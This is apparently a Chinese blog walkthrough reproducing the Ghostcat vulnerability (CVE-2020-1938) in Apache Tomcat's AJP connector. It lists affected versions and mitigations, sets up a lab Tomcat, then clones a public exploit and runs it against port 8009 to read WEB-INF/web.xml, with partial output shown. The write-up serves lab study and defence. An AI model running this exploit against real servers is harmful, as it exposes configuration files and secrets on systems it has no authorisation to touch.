幽灵猫漏洞复现

漏洞编号:
CVE-2020-1938
CNVD-2020-10487
影响版本:
Apache Tomcat = 6
7 <= Apache Tomcat < 7.0.100
8 <= Apache Tomcat < 8.5.51
9 <= Apache Tomcat < 9.0.31
解决措施:
配置ajp配置中的secretRequired跟secret属性来限制认证 ;
临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉
更新最新版 ;
漏洞环境搭建:

//漏洞apache下载
root@kali:~# wget http://192.168.31.149/CVE-2020-1938-master.zip
//解压
root@kali:~# unzip CVE-2020-1938-master.zip 
//进入目录
root@kali:~# cd CVE-2020-1938-master/
解压apache文件
root@kali:~/CVE-2020-1938-master# unzip apache-tomcat-8.5.32.zip 
//进入目录
root@kali:~/CVE-2020-1938-master# cd apache-tomcat-8.5.32/
//给予权限
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32# chmod -R 777 bin/
//运行
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# sh startup.sh 

幽灵猫漏洞复现_第1张图片
访问查看:
幽灵猫漏洞复现_第2张图片
复现:

//靶机查看开放端口
root@kali:~/CVE-2020-1938-master/apache-tomcat-8.5.32/bin# netstat -anptul
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp6       0      0 :::8009                 :::*                    LISTEN      1389/java           
tcp6       0      0 :::8080                 :::*                    LISTEN      1389/java           
tcp6       0      0 127.0.0.1:8005          :::*                    LISTEN      1389/java           
udp        0      0 0.0.0.0:68              0.0.0.0:*                           502/dhclient      
//攻击机下载exp
root@kali:~# git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
root@kali:~# cd CNVD-2020-10487-Tomcat-Ajp-lfi/
//读取WEB-INF/web.xml文件
root@kali:~/CNVD-2020-10487-Tomcat-Ajp-lfi# python CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f WEB-INF/web.xml 192.168.31.62
Getting resource at ajp13://192.168.31.62:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
 Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.

幽灵猫漏洞复现_第3张图片
参考文献:
https://blog.csdn.net/weixin_43886632/article/details/104672219

你可能感兴趣的:(漏洞复现)